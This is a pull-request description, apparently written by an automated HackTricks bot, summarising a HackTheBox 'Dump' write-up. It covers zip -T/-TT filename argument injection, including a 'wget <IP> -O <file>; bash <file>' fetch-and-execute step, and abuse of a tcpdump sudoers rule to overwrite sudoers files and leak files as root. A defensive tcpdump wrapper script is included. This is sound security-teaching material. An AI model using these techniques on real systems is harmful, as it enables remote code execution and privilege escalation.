
@carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://0xdf.gitlab.io/2025/11/04/htb-dump.html
  • Blog Title: HTB: Dump — Zip argument injection to RCE and tcpdump sudo misconfig to root
  • Suggested Section: Web Pentesting > Archive/Zip argument injection via filenames (zip -T/-TT GTFObins) and Linux Privilege Escalation > Sudoers Abuses (wildcards/additional args) > tcpdump

🎯 Content Summary

Target: HackTheBox "Dump" (Hard, Linux). Likely Debian 11 Bullseye from OpenSSH banner; kernel later confirmed as 5.10.0-36-cloud-amd64 (Debian 5.10.244-1, 2025-09-29). Services: SSH 22 (OpenSSH 8.4p1 Debian 5+deb11u5), HTTP 80 (Apache 2.4.65). TTL 63 on ports (Linux, one hop).

App overview (PHP): Auth via session; free registration. Key endpoints discovered with feroxbuster: index.php, capture.php, capturing.php, u...

🔧 Technical Details

Zip argument injection via filenames: When an app zips user files by calling zip archive.zip * (or by passing raw user filenames), attacker-supplied names starting with option flags are parsed as zip options. Use -sc (show processed argv) to debug ordering and then supply -T and -TT <cmd> as separate filenames so the test command becomes your payload. If slashes are stripped, use wget <IP> -O <file>; bash <file> to fetch and execute a payload.

tcpdump sudo rule abuse: If sudoers allows tcpdump with -w containing a globbed directory, add a second -w to override the output path while satisfying the policy. Combine with -Z root to force root ownership, -r <pcap> to inject arbitrary content (e.g., a sudoers line) into sensitive files, and -V <file> to coerce reads that leak file content via ...

🤖 Agent Actions

I analyzed the blog and updated HackTricks with the core, reusable techniques that weren’t fully covered yet:

  • Zip argument injection via filenames to achieve RCE using zip’s -T/-TT tester override, including practical nuances like:
    • Using separate tokens (“-T” and “-TT <cmd>”) due to short-option parsing.
    • Debugging with -sc to view argv processing.
    • Slash-stripping constraints and using wget <IP> -O <file>; bash <file>.
  • Sudoers tcpdump misconfig abuse when extra args and wildcards are allowed:
    • Satisfying the sudoers pattern with the first -w and overriding with a second -w.
    • Forcing root ownership with -Z root.
    • Using -r to replay a crafted PCAP to write attacker-chosen content into protected files (e.g., sudoers.d).
    • Using -V to coerce reads and leak content via diagnostics.
    • Defensive guidance for locking down sudoers and tcpdump usage.

Repository exploration

  • I searched for existing relevant pages and found the best fit to aggregate and extend both topics in one place: src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md.
    • This page already covered wildcard/argument injection themes and had a brief zip entry and a tcpdump wrapper abuse section, so it’s appropriate to extend it with the new zip (-T/-TT) technique and the tcpdump sudoers patterns/abuses.

What I changed

  • File modified: src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
    • Expanded “zip” section with:
      • Detailed -T/-TT exploitation via filenames.
      • -sc argv inspection tip.
      • Handling filename slash restrictions with wget -O and exec.
      • A concise example of local behavior and ordering pitfalls.
    • Added a new section “sudoers: tcpdump with wildcards/additional args → arbitrary write/read and root”:
      • Explained the sudoers anti-pattern, multi -w override, path traversal, -Z root, -r replay to write files, -V read/leak.
      • Included hardening guidance to pin all args, avoid globs, disable dangerous flags, and use a wrapper.
    • Kept existing content intact and consistent with HackTricks style.
    • Updated References with:
      • The blog post URL (0xdf – HTB Dump).
      • GTFOBins zip (in addition to existing tcpdump reference).

Why this location

  • The page already aggregates wildcard/argument injection tricks for archivers and other binaries, including zip and tcpdump wrapper abuses. Extending it avoids duplication elsewhere and keeps related primitives together for discoverability.

No other files were changed to comply with the “one file only” requirement.


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

📚 Repository Maintenance

  • MD files processed: 907
  • MD files fixed: 1

All .md files have been checked for proper formatting (headers, includes, etc.).
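The wrapper approach the hardening guidance above refers to, as an added example (not code from the PR, from HackTricks or from the blog): a POSIX sh sudo wrapper that allowlists tcpdump arguments and re-invokes tcpdump with a fixed argument vector, so a second -w, -Z, -r, -V or a path component is rejected before it reaches the binary. The wrapper path, the /var/captures directory and the interface list are assumptions.

```shell
#!/bin/sh
# Hypothetical sudo wrapper for tcpdump (added example, not HackTricks' or the
# blog's code). sudoers grants the wrapper instead of tcpdump, e.g. (assumed):
#   analyst ALL=(root) NOPASSWD: /usr/local/sbin/safe-tcpdump
# Arguments are checked against an allowlist and tcpdump is re-invoked with a
# fixed argument vector, so a second -w, -Z, -r, -V, -z or any path never
# reaches the real binary.
CAPTURE_DIR="/var/captures"      # assumed fixed output directory
ALLOWED_IFACES="eth0 lo"         # assumed interface allowlist
IFACE="" OUT_FILE="" COUNT="1000"

# validate_args: returns 0 when every argument is acceptable, 1 otherwise.
# Leaves IFACE, COUNT and OUT_FILE ready for the exec at the bottom.
validate_args() {
    IFACE="" OUT_FILE="" COUNT="1000"
    while [ $# -gt 0 ]; do
        case "$1" in
            -i) [ $# -ge 2 ] || return 1
                IFACE=""
                for a in $ALLOWED_IFACES; do
                    [ "$2" != "$a" ] || IFACE="$2"
                done
                [ -n "$IFACE" ] || return 1
                shift 2 ;;
            -w) [ $# -ge 2 ] || return 1
                [ -z "$OUT_FILE" ] || return 1         # a second -w is refused
                case "$2" in                           # plain basename only:
                    ''|.*|-*|*[!A-Za-z0-9_.-]*) return 1 ;;   # no '/', '..', '-x'
                esac
                OUT_FILE="$CAPTURE_DIR/$2"
                shift 2 ;;
            -c) [ $# -ge 2 ] || return 1
                case "$2" in ''|*[!0-9]*) return 1 ;; esac
                COUNT="$2"
                shift 2 ;;
            -n|-nn) shift ;;                           # harmless, accepted
            *) return 1 ;;                             # -Z, -r, -V, -z, filters, ...
        esac
    done
    [ -n "$IFACE" ] && [ -n "$OUT_FILE" ]
}

# With no arguments nothing is executed (usage only); otherwise validate and run.
if [ $# -gt 0 ]; then
    validate_args "$@" || { echo "safe-tcpdump: rejected arguments" >&2; exit 1; }
    exec /usr/sbin/tcpdump -i "$IFACE" -nn -c "$COUNT" -w "$OUT_FILE"
fi
```

Because the script rebuilds the argument vector itself, the sudoers entry needs no wildcard and no argument pattern at all, which is the anti-pattern the page describes.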

@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2025/11/04/htb-dump.html

Content Categories: Based on the analysis, this content was categorized under "Web Pentesting > Archive/Zip argument injection via filenames (zip -T/-TT GTFObins) and Linux Privilege Escalation > Sudoers Abuses (wildcards/additional args) > tcpdump".

Repository Maintenance:

  • MD Files Formatting: 907 files processed (1 files fixed)

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
